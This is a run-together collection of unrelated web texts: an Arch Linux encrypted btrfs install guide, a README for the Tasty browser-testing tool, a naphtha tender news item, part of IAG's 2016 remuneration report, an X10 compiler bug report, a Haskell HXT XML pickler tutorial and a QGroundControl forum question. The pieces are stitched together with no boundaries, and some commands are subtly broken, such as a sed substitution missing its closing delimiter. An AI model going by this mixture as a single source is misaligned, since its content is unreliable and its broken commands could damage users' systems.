MODULES="" BINARIES="" FILES="" HOOKS="base systemd sd-vconsole modconf keyboard block filesystems btrfs sd-encrypt fsck" Finally, recreate the initramfs image: # mkinitcpio -p linux Bootloader Root password # passwd Leave the systemd-nspawn environment Issue a poweroff to exit the nspawned environment: # poweroff This will return you the Arch installer environment where you can wrap up. Legacy boot loader If your system is not UEFI and you need to use a legacy installer like grub, it will need to be installed from within an arch-chroot generated chroot, not the systemd-nspawn running container. An example of this would be (assuming that the drive of the new system is at /dev/sdb): # arch-chroot /mnt # grub-install $DRIVE # grub-mkconfig -o /boot/grub/grub.cfg # exit Command Summary The following are all critical commands (exluded: the initial drive wipe which is optional). It assumes you have successfully brought up networking prior to starting this sequence. DRIVE=/dev/DRIVEID sgdisk --zap-all $DRIVE sgdisk --clear \ --new=1:0:+550MiB --typecode=1:ef00 --change-name=1:EFI \ --new=2:0:+8GiB --typecode=2:8200 --change-name=2:cryptswap \ --new=3:0:0 --typecode=2:8200 --change-name=3:cryptsystem \ $DRIVE mkfs.fat -F32 -n EFI /dev/disk/by-partlabel/EFI cryptsetup luksFormat --align-payload=8192 -s 256 -c aes-xts-plain64 /dev/disk/by-partlabel/cryptsystem cryptsetup open /dev/disk/by-partlabel/cryptsystem system cryptsetup open --type plain --key-file /dev/urandom /dev/disk/by-partlabel/cryptswap swap mkswap -L swap /dev/mapper/swap swapon -L swap mkfs.btrfs --force --label system /dev/mapper/system o=defaults,x-mount.mkdir o_btrfs=$o,compress=lzo,ssd,noatime mount -t btrfs LABEL=system /mnt btrfs subvolume create /mnt/root btrfs subvolume create /mnt/home btrfs subvolume create /mnt/snapshots umount -R /mnt mount -t btrfs -o subvol=root,$o_btrfs LABEL=system /mnt mount -t btrfs -o subvol=home,$o_btrfs LABEL=system /mnt/home mount -t btrfs -o subvol=snapshots,$o_btrfs LABEL=system /mnt/.snapshots pacstrap /mnt base genfstab -L -p /mnt >> /mnt/etc/fstab sed -i "s+LABEL=swap+/dev/mapper/swap" /etc/fstab_labels echo "127.0.1.1 myhostname.localdomain myhostname" >> /etc/hosts pacman -Syu base-devel btrfs-progs iw gptfdisk zsh vim terminus-font Quick and Dirty This is the approximate process I follow if I want to bring up Arch on, say, an old laptop for a quick purpose built test machine, etc. It's not an install that I consider long term maintainable since rollbacks aren't implemented, nor is there any encryption, but it's a good example of how simple installation can be. DRIVE=/dev/DRIVEID sgdisk --zap-all $DRIVE mkfs.btrfs -f $DRIVE mount -t btrfs $DRIVE /mnt pacstrap /mnt base grub poweroff arch-chroot /mnt grub-install --root-directory=/mnt $DRIVE grub-mkconfig -o /mnt/boot/grub/grub.cfg exit reboot
https://wiki.archlinux.org/index.php/User:Altercation/Bullet_Proof_Arch_Install
CC-MAIN-2018-39
refinedweb
4,399
53.71
Tasty helps test fully assembled web applications in nearly-production environment on real clients as real users. npm install -g tasty Tasty supports both multiple and single page applications (with server rendering too) and code coverage. It respects Content Security Policy and SSL/TLS. Tasty server controls connected clients to run your tests against your application. Client can emulate real user: navigate, fill forms, check content. tasty.jsmodule to your assembly or markup. No. Tasty is intended to run inside browser environment without WebDriver. However, you can use Selenium-driven clients and headless browsers like PhantomJS or SlimerJS to work with Tasty. The main purposes are: Tasty gives you only high-level tools to help treat your application as a black box, just like real user does. Interact with text and graphics, not with heartless HTML elements. Try not to use knowledge of your application's markup, assume you're helping a real person to achieve some goals. Protractor and WebdriverIO are Selenium-based end-to-end test frameworks useful for intergration testing. Also take a look at Appium, CasperJS and Selendroid. Karma and Testee are great tools for cross-browser unit testing. Serve your application. Write a test (this one uses Mocha). ; Run Tasty server. tasty test.js --username 'John Doe' --password 'secret!' Open your application in your client. Tasty will run the test, print all output and exit. Tasty server is a bridge between the clients and the test runner, it controls each client and runs tests written using Tasty tools. Use --url flag to configre server's own URL. Tasty client is a small extendable UMD module that connects to the server and executes its commands. Tasty supports any test frameworks that support asynchronous tests. There are built-in runners for Mocha, Jasmine and QUnit. Provide --runner <name> flag to use one of them. For other frameworks, use Tasty programmatically from your runner. Chai, its plugins and other helper libraries are supported by providing --addon <name>,<name>... flag. For example, --addon chai,chai-as-promised,chai-http works fine. Use --watch flag to watch for changes or run on several clients. See tasty --help for more information. You can run built-in static server on the same URL by passing --static <path/to/root> flag. When serving application from its own server, you should instrument JavaScript code for coverage by yourself. Tasty's static server has built-in support for Istanbul and NYC (aka Istanbul 2) to automatically do it for you. For Tasty server running on localhost:8765/path you should add the following CSP directives for Tasty client to work properly: connect-src localhost:8765/path ws://localhost:8765/path wss://localhost:8765/pathscript-src localhost:8765/path/*.js Unfortunately, both Istanbul and NYC instrumenters use new Function() to get top-level scope. To use one of them, you have to add the following directive: script-src 'unsafe-eval' Tasty's static server automatically injects that directive into HTML files when --coverage <name> flag is used. Remember, CSP allows consequently applied directives to only restrict the resulting set, i.e. meta tags can't expand/loose header directives and vice versa. Check out a great tool for generating and validating CSP directives. Tasty client runs inside JavaScript sandbox, so it simply can't emulate real interaction, as debugging protocols or WebDriver can. Currently Tasty can't find text +1 123 456-78-90 in the following case: +1 In other words, it's too hard to join text fragments of textContent, value/placeholder, :before/:after etc. Work is in progress. Search cannot detect text from alt attribute yet. When using auto-focus elements (such as input), you could encounter cannot type into active node <body /> error when window loses its focus, which causes type and paste tools to fail. If you don't want to focus such elements explicitly (using click or something else), make sure that client window remain focused during tests. For WebDriver clients you could maximize window or use alert() workaround to focus reliably. Additionally, Chrome DevTools could force current tab to lose focus, with the same results. Not supported yet. Some elements of browser itself, such as tooltips from title attribute or HTML5 Form validation messages, could be potentially detected, but currently aren't supported. Each tool adds corresponding action to the runner queue instead of performing that action immediately. This allows to write tests in synchronous manner. ;;; Queue is executed after now() call without arguments, which returns Promise instance. ; Your testing framework may prefer callback for async tests. ; For testing SPA (or rich MPA) you can provide a method for Tasty to ensure that client is ready for the next action. The simpliest way is to just wait after using some tools. ; You may override the list of tools to wait after. ; You always can manually add a delay into queue. ; There could be enough to just check if DOM is ready... ; // 'DOMContentLoaded' aka 'interactive' readyState ; // 'load' aka 'complete' readyState ...and maybe wait a little bit. ; ; Another way is to provide some application-specific code. ; ; Note that built-in methods cannot be combined. The now(...) call with function(s) allows you to add some custom logic into test, but you should use now.* namespace for tools. ; The now.smth() is the same as just smth(), but runs immediately. You should use now.* tools only inside now(...) call if you don't want to break execution order. ; On staging or other near-production environment, Tasty can't pass (re)CAPTCHA or two-factor authentication for you. Store passwords in CIS and pass credentials into command line. All arguments will be available in tasty.config object. Get two-factor nonces from backdoor or use paid services to mock real mobile phones. Use reCAPTCHA testing sitekey and secret for testing environment. Instead of trying to click on iframed content, simply fake reCAPTCHA response with some suitable string, e.g. ; For testing sitekey and secret, reCAPTCHA server should accept the same g-recaptcha-response unlimited number of times. If example above doesn't work (e.g. response format is changed), get new fake g-recaptcha-response string: valueproperty of <textarea name="g-recaptcha-response" />on the page. For other CAPTCHA implementations, get answers from backdoor. Do not use production certificates with Tasty: server is not intended to be accessible from external networks. Use Let's encrypt, self-signed non-CA certificates or set up your own CA. npm run prepublish npm test Main tests use SlimerJS and PhantomJS. SlimerJS itself requires Firefox to be installed. PhantomJS suite requires phantomjs to be available via command prompt. npm run support Real-browser support tests are made possible by SauceLabs. Automation requires SAUCE_USERNAME and SAUCE_ACCESS_KEY environment variables, which are kindly provided by TravisCI. Everything works fine, yay!
https://www.npmjs.com/package/tasty
CC-MAIN-2017-22
refinedweb
1,130
59.3
Difference between revisions of "HXT/Conversion of Haskell data from/to XML" Revision as of 16:49, 19 April 2008 Serializing and deserializing Haskell data to/from XML With so called pickler functions and arrows, it becomes rather easy and straight forward to convert native Haskell values to XML and vice versa. The module Text.XML.HXT.Arrow.Pickle and submodules contain a set of picklers (conversion functions) for simple data types and pickler combinators for complex types. Contents - 1 Serializing and deserializing Haskell data to/from XML - 2 The idea: XML pickler - 3 Example: Processing football league data - 4 Example: A toy programming language - 5 A few words of advice The idea: XML pickler For conversion of native Haskell data a and a sequence of Chars looks like this. type St = [Char] data PU a = PU { appPickle :: (a, St) -> St , appUnPickle :: St -> (a, St) } Andrew Kennedy has described in a programming pearl paper [1], how to define primitive picklers and a set of pickler combinators to de-/serialize from/to (Byte-)Strings. The HXT picklers are an adaptation of these pickler combinators. The difference to Andrew Kennedys approach is, that the target is not a list of Chars but a list of XmlTrees. The basic picklers will convert data into XML text nodes. New are the picklers for creating elements and attributes. The HXT pickler type is defined as follows data St = St { attributes :: [XmlTree] , contents :: [XmlTree] } data PU a = PU { appPickle :: (a, St) -> St , appUnPickle :: St -> (Maybe a, St) , theSchema :: Schema } In XML there are two places for storing. Example: Processing football league data <SEASON YEAR="1998"> <LEAGUE NAME="National League"> <DIVISION NAME="East"> <TEAM CITY="Atlanta" NAME="Braves"> <PLAYER GIVEN_NAME="Marty" SURNAME="Malloy" POSITION="Second Base" GAMES="11" GAMES_STARTED="8" AT_BATS="28" RUNS="3" HITS="5" DOUBLES="1" TRIPLES="0" HOME_RUNS="1" RBI="1" STEALS="0" CAUGHT_STEALING="0" SACRIFICE_HITS="0" SACRIFICE_FLIES="0" ERRORS="0" WALKS="2" STRUCK_OUT="2" HIT_BY_PITCH="0"> </PLAYER> <PLAYER GIVEN_NAME="Ozzie" SURNAME="Guillen" POSITION="Shortstop" GAMES="83" GAMES_STARTED="59" AT_BATS="264" RUNS="35" HITS="73" DOUBLES="15" TRIPLES="1" HOME_RUNS="1" RBI="22" STEALS="1" CAUGHT_STEALING="4" SACRIFICE_HITS="4" SACRIFICE_FLIES="2" ERRORS="6" WALKS="24" STRUCK_OUT="25" HIT_BY_PITCH="1"> </PLAYER> <PLAYER GIVEN_NAME="Danny" ... </PLAYER> <PLAYER GIVEN_NAME="Gerald" ...> </PLAYER> ... </TEAM> <TEAM CITY="Florida" NAME="Marlins"> </TEAM> <TEAM CITY="Montreal" NAME="Expos"> </TEAM> <TEAM CITY="New York" NAME="Mets"> </TEAM> <TEAM CITY="Philadelphia" NAME="Phillies"> </TEAM> </DIVISION> ... </LEAGUE> <LEAGUE NAME="American League"> <DIVISION NAME="East"> ... </DIVISION> <DIVISION NAME="Central"> ... </DIVISION> ... </LEAGUE> </SEASON> The Haskell data model Let's first analyze the underlying data model and then define an appropriate set of Haskell, the firstName, the lastName, the position, atBats, hits and era. All others will be ignored. So the Haskell data model looks like this import Data.Map (Map, fromList, toList) data Season = Season { sYear :: Int , sLeagues :: Leagues } deriving (Show, Eq) type Leagues = Map String Divisions type Divisions = Map String [Team] data Team = Team { teamName :: String , city :: String , players :: [Player] } deriving (Show, Eq) data Player = Player { firstName :: String , lastName :: String , position :: String , atBats :: Maybe Int , hits :: Maybe Int , era :: Maybe Float } deriving (Show, Eq) The predefined picklers In HXT here is a class XmlPickler defining a single function xpickle for overloading the xpickle name. class XmlPickler a where xpickle :: PU a For the simple data types there is an instance for XmlPickler, which uses the primitive pickler xpPrim for conversion from and to XML text nodes. This primitive pickler is available for all types supporting read and show. instance XmlPickler Int where xpickle = xpPrim instance XmlPickler Integer where xpickle = xpPrim ... For composite data there are predefined pickler combinators for tuples, lists and Maybe types. instance (XmlPickler a, XmlPickler b) => XmlPickler (a,b) where xpickle = xpPair xpickle xpickle instance XmlPickler a => XmlPickler [a] where xpickle = xpList xpickle instance XmlPickler a => XmlPickler (Maybe a) where xpickle = xpOption xpickle - xpPair take two picklers and builds up a pickler for a tuple type. There are also pickler combinators for triples, 4- and 5- tuples. - xpList takes a pickler for an element type and gives a list pickler - xpOption takes a pickler and returns a pickler for optional values. Furthermore we need pickler for generating/reading element and attribute nodes - xpElem generates/parses an XML element node - xpAttr generates/parses an attribute node Most of the other structured data is pickled/unpickled by converting the data to/from tuples, lists and options. This is done by a wrapper pickler xpWrap. Constructing the example picklers For every Haskell type we will define a pickler. For the own data types we will declare instances of XmlPickler instance XmlPickler Season where xpickle = xpSeason instance XmlPickler Team where xpickle = xpTeam instance XmlPickler Player where xpickle = xpPlayer Then the picklers are developed top down starting with xpSeason. xpSeason :: PU Season xpSeason = xpElem "SEASON" $ xpWrap ( uncurry Season , \ s -> (sYear s, sLeagues s)) $ xpPair (xpAttr "YEAR" xpickle) xpLeagues A Season value is mapped onto an element SEASON with xpElem. This constructs/reads the XML SEASON element. The two components of Season are wrapped into a pair with xpWrap. xpWrap needs a pair of functions for a 1-1 mapping between Season and (Int, Leagues). The first component of the pair, the year is mapped onto an attribute YEAR, the attribute value is handled with the predefined pickler for Int. The second one, the Leagues are handled by xpLeagues. xpLeagues :: PU Leagues xpLeagues = xpWrap ( fromList , toList ) $ xpList $ xpElem "LEAGUE" $ xpPair (xpAttr "NAME" xpText) xpDivisions xpLeagues has to deal with a Map value. This can't done directly, but the Map value is converted to/from a list of pairs with xpWrap and (fromList, toList). Then the xpList is applied for the list of pairs. Each pair will be represented by an LEAGUE element, the name is mapped to an attribute NAME, the divisions are handled by xpDivisions. xpDivisions :: PU Divisions xpDivisions = xpWrap ( fromList , toList ) $ xpList $ xpElem "DIVISION" $ xpPair (xpAttr "NAME" xpText) xpickle The divisions are pickled by the same pattern as the leagues. xpTeam :: PU Team xpTeam = xpElem "TEAM" $ xpWrap ( uncurry3 Team , \ t -> (teamName t, city t, players t)) $ xpTriple (xpAttr "NAME" xpText) (xpAttr "CITY" xpText) (xpList xpickle) With the teams we have to wrap the three components into a 3-tuple with xpWrap and then pickle a triple of two attributes and a list of players. xpPlayer :: PU Player xpPlayer = xpElem "PLAYER" $ xpWrap ( \ ((f,l,p),(a,h,e)) -> Player f l p a h e , \ t -> ((firstName t, lastName t, position t),(atBats t, hits t, era t))) $. New in this case is the use of xpOption for mapping Maybe values onto optional attributes. The other attributes used in the input, are ignored during unpickling the XML, but this is the only place where the pickler is tolerant with wrong XML. A simple application import Text.XML.HXT.Arrow -- ... main :: IO () main = do runX ( xunpickleDocument xpSeason [ (a_validate,v_0) , (a_trace, v_1) , (a_remove_whitespace,v_1) , (a_preserve_comment, v_0) ] "simple2.xml" >>> processSeason >>> xpickleDocument xpSeason [ (a_indent, v_1) ] "new-simple2.xml" ) return () -- the dummy for processing the unpickled data processSeason :: IOSArrow Season Season processSeason = arrIO ( \ x -> do {print x ; return x}) This application reads in the complete data used in HXT/Practical/Simple2 from file simple2.xml and unpickles it into a Season value. This value is processed (dummy: print out) by processSeason and pickled again into new-simple2.xml The unpickled value, when formated a bit, looks like this Season { sYear = 1998 , sLeagues = fromList [ ( "American League" , fromList [ ( "Central" , [ Team { teamName = "White Sox" , city = "Chicago" , players = []} , ... ]) , ( "East" , [ Team { teamName = "Orioles" , city = "Baltimore" , players = []} , ... ]) , ( "West" , [ Team { teamName = "Angels" , city = "Anaheim" , players = []} , ... ]) ]) , ( "National League" , fromList [ ( "Central" , [ Team { teamName = "Cubs" , city = "Chicago" , players = []} , ... ]) , ( "East" , [ Team { teamName = "Braves" , city = "Atlanta" , players = [ Player { firstName = "Marty" , lastName = "Malloy" , position = "Second Base" , atBats = Just 28 , hits = Just 5 , era = Nothing} , Player { firstName = "Ozzie" , lastName = "Guillen" , position = "Shortstop" , atBats = Just 264 , hits = Just 73 , era = Nothing} , ... ]} , ... ]) , ( "West" , [ Team { teamName = "Diamondbacks" , city = "Arizona" , players = []} , ... ]) ]) ] } Example: A toy programming language In this second example we will develop the picklers the other way round. We start with a given data model and derive an XML document structure. The complete source is part of the HXT distribution. DTDs. When designing picklers, one must be careful to put enough markup into the XML structure, to read the XML back without the need for a lookahead and without any ambiguities. The simplest case of a not working pickler is a pair of primitve picklers e.g. for some text. In this case the text is written out and concatenated into a single string, when parsing the XML, there will only be a single text and the pickler will fail because of a missing value for the second component. So at least every primitive pickler must be combined with an xpElem or xpAttr. Please do not try to convert a whole large database into a single XML file with this approach. This will run into memory problems when reading the data, because of the DOM approach used in HXT. In the HXT distribution, there is a test case in the examples dir performance, where the pickling and unpickling is done with XML documents containing 2 million elements. This is the limit for a 1G Intel box (tested with ghc 6.8). There are two strategies to overcome these limitations. The first is a SAX like approach, reading in simple tags and text elements and not building a tree structure, but writing the data instantly into a database. For this approach the Tagsoup package can be useful. The disadvantage is the programming effort for collecting and converting the data. The second and recommended way is, to split the whole bunch of data into smaller pieces, unpickle these and link the resulting documents together by the use of 'hrefs.
https://wiki.haskell.org/index.php?title=HXT/Conversion_of_Haskell_data_from/to_XML&diff=prev&oldid=20633
CC-MAIN-2021-39
refinedweb
1,618
50.67
Details - Type: Improvement - Status: Open - Priority: Major - Resolution: Unresolved - Affects Version/s: X10 2.2 - - Component/s: X10 Compiler: Front-end Error Messages - Labels:None - Number of attachments : Description import x10.compiler.*; class Dood { static class IDed { protected static val counts = [0 as Int,0]; val id: Float; public def this(kind:Int) { this.id = this.count(kind); } @NoThisAccess def count(kind:Int) : Float = ++counts(kind % 2); public def toString() = "#" + id; } static class SubIDed extends IDed { protected static val subcounts = [0 as Int, 0, 0]; @NoThisAccess def count(kind:Int) : Float { val subcount <: Int = ++subcounts(kind % 3); // No super-access, so we end up replicating code (or something) val supercount <: Float = ++counts(kind % 2); return supercount + 1.0f / subcount; } } static def main(Array[String]){ for(k in 1..10) { val id <: IDed = new IDed(k); Console.OUT.println("k=" + k + "; id=" + id); } } } The error message here is: /Users/bard/x10/tmp/Dood.x10:12: No valid constructor found for Dood.IDed(). 1 error. A better error message might point out that some auto-generated code (the SubIDed ctor) is trying to call some other auto-generated code which isn't there. This is an admittedly tricky situation to explain in a pithy one-line error message, but we might do better with: /Users/bard/x10/tmp/Dood.x10:12: Automatically generated constructor Dood.SubIDed() calls super(), but the superclass Dood.IDed does not have a constructor that matches this call. Activity defer to 2.4.2 Show David Grove added a comment - defer to 2.4.2 bulk defer to 2.4.3 Show David Grove added a comment - bulk defer to 2.4.3 bulk defer to 2.4.4 Show David Grove added a comment - bulk defer to 2.4.4 bulk defer to 2.5.2 Show David Grove added a comment - bulk defer to 2.5.2 bulk defer to 2.5.3 Show David Grove added a comment - bulk defer to 2.5.3 bulk defer of open issues to 2.2.2.
http://jira.codehaus.org/browse/XTENLANG-2759?focusedCommentId=278711&page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel
CC-MAIN-2015-18
refinedweb
338
60.11
20 September 2012 03:34 [Source: ICIS news] SINGAPORE (ICIS)--State-owned refiner Indian Oil has sold by tender 36,000-38,000 tonnes of naphtha for loading in the first half of October, traders said on Thursday. The company sold 30,000 tonnes of naphtha for loading from Kandla on 8-10 October to Oil Company of the Azerbaijan Republic (SOCAR) at a premium of $26-27/tonne (€20-21/tonne) to Middle East quotes FOB (free on board), they said. To Vitol, Indian Oil sold 6,000-8,000 tonnes of naphtha for loading from Haldia on the same dates at a discount of 45/tonne to ?xml:namespace> The cargo ex-Haldia contained high amount of methyl tertiary butyl ether (MTBE), they added. MTBE is used as an additive to boost octane levels in gasoline. Indian Oil previously sold by tender 35,000-40,000 tonnes of naphtha for loading from Dahej on 1-3 October to SOCAR at a premium of more than $40
http://www.icis.com/Articles/2012/09/20/9597037/indian-oil-sells-36000-38000-tonnes-h1-october-naphtha.html
CC-MAIN-2014-15
refinedweb
168
55.27
92 Report of the Remuneration Committee continued Directors’ interests in shares Subject to audit Total shares and voting rights Percentage of capital Antonio Vázquez 512,291 0.024 Willie Walsh 1,656,082 0.078 Marc Bolland 0 0.000 Patrick Cescau 0 0.000 Enrique Dupuy de Lôme 466,807 0.022 Baroness Kingsmill 2,000 0.000 James Lawrence 1 326,500 0.016 María Fernanda Mejía 100 0.000 Kieran Poynter 15,000 0.001 Emilio Saracho 0 0.000 Dame Marjorie Scardino 100 0.000 Alberto Terol 16,900 0.001 Total 2,995,780 0.140 1 Held as IAG ADSs (one IAG ADS equals two IAG shares). There have been no changes to the shareholdings set out above between December 31, 2016 and the date of this report. Share scheme dilution limits The Investment Association sets guidelines that restrict the issue of new shares under all the Company’s share schemes in any ten year period to 10 per cent of the issued ordinary share capital and restrict the issues under the Company’s discretionary schemes to 5 per cent in any ten year period. At the annual Shareholders’ Meeting on June 18, 2015 the Company was given authority to allocate up to 67,500,000 shares (3.31 per cent of the share capital) in 2015, 2016, 2017 and 2018. Of this a maximum of 7,650,000 shares could be allocated to executive directors under all IAG share plans for awards made during 2015, 2016, 2017 and 2018. At December 31, 2016, 2.33 per cent of the share capital had been allocated under the IAG share plans. The highest and lowest closing prices of the Company’s shares during the period and the share price at December 31, 2016 were: At December 31 2016 Highest in the period Lowest in the period 441p 611p 344p Company performance graph and Chief Executive Officer of IAG ‘single figure’ table The chart shows the value by December 31, 2016 of a hypothetical £100 invested on listing compared with the value of £100 invested in the FTSE 100 index over the same period. A spot share price has been taken on the date of listing, and a three month average has been taken prior to the year ends. The FTSE 100 was selected because it is a broad equity index of which the Company is a constituent, and the index is widely recognised. INTERNATIONAL AIRLINES GROUP Annual Report and Accounts 2016 93 IAG’s total shareholder return (TSR) performance compared to the FTSE 100 250 200 150 100 50 Jan 2011 Dec 2011 Dec 2012 Dec 2013 Dec 2014 Dec 2015 Dec 2016 IAG FTSE 100 The table below shows the CEO ‘single total figure’ of remuneration for each year since the creation of IAG in January 2011: CEO of IAG – ‘total single figure’ of remuneration Annual incentive Long-term incentive 2011 £1,550,000 Includes annual incentive payment of £302,000 (18 per cent of maximum). Includes £251,594 value of long-term incentives vesting (35 per cent of maximum). 2012 £1,083,000 No annual incentive payment. Zero vesting of long-term incentives. 2013 £4,971,000 Includes annual incentive payment of £1,299,375 (78.75 per cent of maximum). 2014 £6,390,000 Includes annual incentive payment of £1,662,222 (97.78 per cent of maximum). 2015 £6,455,000 Includes annual incentive payment of £1,360,000 (80 per cent of maximum). 2016 £2,462,000 Includes annual incentive payment of £566,667 (33.33 per cent of maximum). Includes £2,593,569 value of long-term incentives vesting (100 per cent of maximum). Includes £3,640,135 value of long-term incentives vesting (85 per cent of maximum). Includes £4,405,185 value of long-term incentives vesting (100 per cent of maximum). Includes £807,741 value of long-term incentives vesting (50 per cent of maximum). Single total figure of remuneration includes basic salary, taxable benefits, pension related benefits, annual incentive award, and longterm incentive vesting. Strategic Report Corporate Governance Financial Statements Additional Information 2011 figure includes 20 days of remuneration in January 2011 paid by British Airways. Percentage change in remuneration of the Chief Executive Officer of IAG compared to employees The table below shows how the remuneration of the Chief Executive Officer of IAG has changed for 2016 compared to 2015. This is then compared to a group of appropriate employees. It has been determined that the most appropriate group of employees are all UK employees in the Group, comprising around 40,000 employees in total. To make the comparison between the CEO of IAG and employees as meaningful as possible, it was determined that as large a group as possible of employees should be chosen. The selection of all UK employees in the Group (roughly two-thirds of the entire Group’s employees) meets these criteria. The majority of the 40,000 UK employees in the Group are employed by BA, but there are also a number of employees from all other companies in the Group based in the UK. It was determined that employees outside the UK would not be considered for the comparison, as very different employment market conditions exist in other countries. Chief Executive Officer of IAG UK employees Basic salary No basic salary increase for 2016. Basic salary awards in 2016 at UK companies in the Group averaged around 2 per cent. Annual incentive Decrease from £1,360,000 in March 2016 (covering the 2015 performance period) to £566,667 in March 2017 (covering the 2016 performance period). This represents a 58 per cent decrease. Taxable benefits No change in benefits policy. Actual payments decreased to £24,000 in 2016 from £27,000 in 2015. Changes in overall annual incentive payments for 2016 vs. 2015 varied considerably around the Group, depending on the incentive design, financial performance, and non-financial performance at each individual company. No change in benefits policy. Overall costs 2016 vs. 2015 increased very slightly in line with inflation.
https://www.yumpu.com/en/document/view/59837104/annual-report-and-accounts-2016/95
CC-MAIN-2018-13
refinedweb
1,012
55.44
- NAME - SYNOPSIS - DESCRIPTION - FUNCTION - DEPENDENCIES - TODO - BUGS - AUTHOR - SEE ALSO NAME File::Random - Perl module for random selecting of a file SYNOPSIS use File::Random qw/:all/; my $fname = random_file(); my $fname2 = random_file(-dir => $dir); my $random_gif = random_file(-dir => $dir, -check => qr/\.gif$/, -recursive => 1); my $no_exe = random_file(-dir => $dir, -check => sub {! -x}); my @jokes_of_the_day = content_of_random_file(-dir => '/usr/lib/jokes'); my $joke_of_the_day = content_of_random_file(-dir => '/usr/lib/jokes'); # or the shorter my $joke = corf(-dir => '/usr/lib/jokes'); my $word_of_the_day = random_line('/usr/share/dict/words'); my @three_words = random_line('/usr/share/dict/words',3); # or my ($title,$speech,$conclusion) = random_line('/usr/share/dict/words'); DESCRIPTION This module simplifies the routine job of selecting a random file. (As you can find at CGI scripts). It's done, because it's boring (and errorprone),. FUNCTION random_file - random_file Returns a randomly selected file(name) from the specified directory If the directory is empty, undef is returned. There are 3 options: my $file = random_file( -dir => $dir, -check => qr/.../, # or sub { .... } -recursive => 1 # or 0 ); Let's have a look to the options: - -dir (-d or -directory) Specifies the directory where file has to come from. If no -diroption is specified, a random file from the current directory will be used. That means '.' is the default for the -diroption. - -check (-c) With the -checkoption you can either define a regex every filename has to follow, or a sub routine which gets the filename as argument. The filename passed as argument includes the relative path (relative to the -dirdirectory or the current directory). The argument is passed implicit as localized value of $_and it is also the first parameter on the argument array $_[0]. Note, that -checkdoesn't accept anything else than a regexp or a subroutine. A string like '/.../' won't work. The default is no checking (undef). - -recursive (-r or -rec) Enables, that subdirectories are scanned for files, too. Every file, independent from its position in the file tree, has the same chance to be choosen. Now the relative path from the given subdirectory or the current directory of the randomly choosen file is included to the file name. Every true value sets recursive behaviour on, every false value switches off. The default if false (undef). Note, that I programmed the recursive routine very defendly (using File::Find). So switching -recursive on, slowers the program a bit :-) Please look to the File::Findmodule for any details and bugs related to recursive searching of files. - unknown options Gives a warning. Unknown options are ignored. Note, that upper/lower case makes a difference. (Maybe, once a day I'll change it) FUNCTION content_of_random_file (or corf) Returns the content of a randomly selected random file. In list context it returns an array of the lines of the selected file, in scalar context it returns a multiline string with whole the file. The lines aren't chomped. This function has the same parameters and a similar behaviour to the random_file method. Note, that -check option still gets passed the filename and not the file content. Instead of the long content_of_random_file, you can also use the alias corf (but don't forget to say either use File::Random qw/:all/ or use File::Random qw/corf/) FUNCTION random_line($filename [, $nr_of_lines]) Returns one or $nr_of_lines random_lines from an (existing) file. If the file is empty, undef is returned. The algorithm used for returning one line is the one from the FAQ. See perldoc -q "random line" for details. For more than one line ( $nr_of_lines > 1), I use nearly the same algorithm. Especially the returned lines aren't a sample, as a line could be returned doubled. The result of random_line($filename, $nr) should be quite similar to map {random_line($filename)} (1 .. $nr), only the last way is not so efficient, as the file would be read $nr times instead of one times. It also works on large files, as the algorithm only needs two lines of the file at the same time in memory. $nr_of_lines is an optional argument which is 1 at default. Calling random_line in scalar context with $nr_of_lines greater than 1, gives a warning, as it doesn't make a lot of sense. I also gives you a warning of $nr_of_lines is zero. You also can write something like my ($line1, $line2, $line3) = random_line($fname); and random_line will return a list of 3 randomly choosen lines. Allthough File::Random tries its best to find out how many lines you wanted, it's not an oracle, so my @line = random_line($fname); will be interpreted as my @line = random_line($fname,1); EXPORT None by default. You can export the function random_file with use File::Random qw/random_file/;, use File::Random qw/content_of_random_file/ or with the more simple use File::Random qw/:all/;. I didn't want to pollute namespaces as I could imagine, users write methods random_file to create a file with random content. If you think I'm paranoid, please tell me, then I'll take it into the export. DEPENDENCIES This module requires these other modules and libraries: Want For the tests are also needed many more modules: Test::More Test::Exception Test::Class Set::Scalar File::Temp Test::Warn Test::ManyParams Test::Class itselfs needs the following additional modules: Attribute::Handlers Class::ISA IO::File Storable Test::Builder Test::Builder::Tester Test::Differences All these modules are needed only for the tests. You can work with the module even without them. These modules are only needed for my test routines, not by the File::Random itself. (However, it's a good idea most to install most of the modules anyway). TODO A -firstline or -lines = [1 .. 10]> option for the content_of_random_file could be useful. Also speed could be improved, as I tried to write the code very readable, but wasted sometimes a little bit speed. Please feel free to suggest me anything what could be useful. BUGS Well, because as this module handles some random data, it's a bit harder to test. So a test could be wrong, allthough everything is O.K.. To avoid it, I let many tests run, so that the chances for misproofing should be < 0.0000000001% or so. Even it has the disadvantage that the tests need really long :-( I'm not definitly sure whether my test routines runs on OS, with path seperators different of '/', like in Win with '\\'. Perhaps anybody can try it and tell me the result. [But remember Win* is definitly the greater bug.] This Program is free software. You can change or redistribute it under the same condition as Perl itself. AUTHOR Janek Schleicher, <bigj@kamelfreund.de> SEE ALSO Tie::Pick Data::Random Algorithm::Numerical::Sample 2 POD Errors The following errors were encountered while parsing the POD: - Around line 229: '=item' outside of any '=over' - Around line 295: You forgot a '=back' before '=head2'
https://metacpan.org/pod/release/BIGJ/File-Random-0.17/Random.pm
CC-MAIN-2017-09
refinedweb
1,139
64.1
Hi, I’m trying to learn more about QGroundControl by compiling it and playing around. I’m able to build and run for linux, but when opening the form editor I get the errors with QtQuick imports: import QtQuick.Window 2.2 — QML module not found I’ve got this for several versions of QtCreator and Qt, now I use Qt Creator 4.11.1 and Qt libs 5.12.5, as recommended in the docs. The problem is that I can’t learn how the UI stuff works (signals etc) I’ve found a rather disheartening remark about this issue: “An import statement import QtQuick.Window 2.2 is always annotated with “QML module not found” error message.” “This bug is very old! But still present unfortunately. It seems to be occurred very chancy in any platform and then it will be present and make developers sad. I already have same problem from some month ago and it is still here after many updates. I have not any solution yet.” Is this still the case?
https://discuss.px4.io/t/building-qgroundcontrol-compiles-but-qtquick-window-not-found/15195/1
CC-MAIN-2020-10
refinedweb
176
75.71
